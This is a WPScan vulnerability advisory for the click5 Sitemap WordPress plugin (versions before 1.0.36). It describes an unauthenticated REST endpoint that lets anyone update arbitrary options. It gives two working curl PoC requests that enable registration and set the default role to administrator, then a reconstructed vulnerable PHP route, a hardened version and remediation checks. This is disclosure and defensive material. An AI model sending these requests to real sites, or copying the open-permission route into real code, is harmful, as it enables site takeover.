wpvulndb / cydave
WPVDB-ID: 0F694961-AFAB-44F9-846C-E80A0F6C768B
History: Apr 11, 2022 - 12:00 a.m.

Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update

Author: cydave
Source: wpscan.com
Tags: sitemap plugin, unauthenticated, arbitrary options update, rest endpoint, csrf checks, attack, admin account

EPSS: 0.48 (percentile: 97.5%)

The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.

PoC

Allow user registrations:

```shell
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
  -H 'Content-Type: application/json' \
  --data '{"users_can_register": 1}'
```

Set the default user role to administrator:

```shell
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
  -H 'Content-Type: application/json' \
  --data '{"default_role": "administrator"}'
```
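The three missing controls named in the description (no authorisation check, no CSRF check, no restriction to the plugin's own options) map onto a few lines of a WordPress REST route registration. The following is an added illustration, not the click5 Sitemap plugin's code and not taken from WPScan: a hypothetical reconstruction of the unsafe registration pattern the advisory describes, followed by a hardened version of the same endpoint. Only the vulnerable route path comes from the page; the `example-sitemap/v1` namespace, the `example_sitemap_*` function names and the option allowlist are assumptions.

```php
<?php
// Added example, not the plugin's own source. Reconstructs the pattern the advisory
// describes (hypothetical), then shows a hardened route. Requires WordPress >= 5.5.

// ---- UNSAFE PATTERN (hypothetical reconstruction) ------------------------------
// permission_callback admits everyone (omitting it entirely has the same effect),
// so unauthenticated callers reach the callback, and every key in the JSON body is
// written straight to update_option(). A body of {"default_role": "administrator"}
// therefore rewrites a core WordPress option, not a plugin option.
add_action('rest_api_init', function () {
    register_rest_route('click5_sitemap/API', '/update_html_option_AJAX', [
        'methods'             => 'POST',
        'permission_callback' => '__return_true',
        'callback'            => function (WP_REST_Request $request) {
            foreach ((array) $request->get_json_params() as $name => $value) {
                update_option($name, $value);
            }
            return rest_ensure_response(['ok' => true]);
        },
    ]);
});

// ---- HARDENED PATTERN ----------------------------------------------------------
// Hypothetical plugin option names, each paired with the sanitiser it needs.
const EXAMPLE_SITEMAP_ALLOWED_OPTIONS = [
    'example_sitemap_html_enabled' => 'bool',
    'example_sitemap_html_title'   => 'text',
];

// Authorisation: require the capability that guards wp-admin/options.php.
// CSRF: WordPress core treats a cookie-authenticated REST request that lacks a
// valid X-WP-Nonce as anonymous (rest_cookie_check_errors), so a capability check
// here also defeats cross-site requests riding on an admin's session cookie.
function example_sitemap_can_update_options(WP_REST_Request $request) {
    if (!current_user_can('manage_options')) {
        return new WP_Error(
            'rest_forbidden',
            'Insufficient permissions.',
            ['status' => rest_authorization_required_code()] // 401 or 403
        );
    }
    return true;
}

// Scope: only options on the plugin's allowlist can be touched, so core options
// such as users_can_register or default_role are unreachable through this route.
function example_sitemap_update_options(WP_REST_Request $request) {
    $updated = [];
    foreach ((array) $request->get_json_params() as $name => $value) {
        if (!array_key_exists($name, EXAMPLE_SITEMAP_ALLOWED_OPTIONS)) {
            return new WP_Error(
                'rest_invalid_param',
                sprintf('Option "%s" is not managed by this plugin.', $name),
                ['status' => 400]
            );
        }
        $clean = EXAMPLE_SITEMAP_ALLOWED_OPTIONS[$name] === 'bool'
            ? rest_sanitize_boolean($value)
            : sanitize_text_field((string) $value);
        update_option($name, $clean);
        $updated[] = $name;
    }
    return rest_ensure_response(['updated' => $updated]);
}

add_action('rest_api_init', function () {
    register_rest_route('example-sitemap/v1', '/options', [
        'methods'             => WP_REST_Server::EDITABLE,
        'permission_callback' => 'example_sitemap_can_update_options',
        'callback'            => 'example_sitemap_update_options',
    ]);
});
```

For a site running a version below 1.0.36, the quickest check is to send the advisory's request without any cookies against a throwaway option name and confirm the response is 401 or 403 rather than 200; after updating to 1.0.36 or later, also review `wp_options` for unexpected values of `users_can_register` and `default_role` and audit any administrator accounts created since April 2022, since a change to those two options leaves no trace in the plugin itself.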

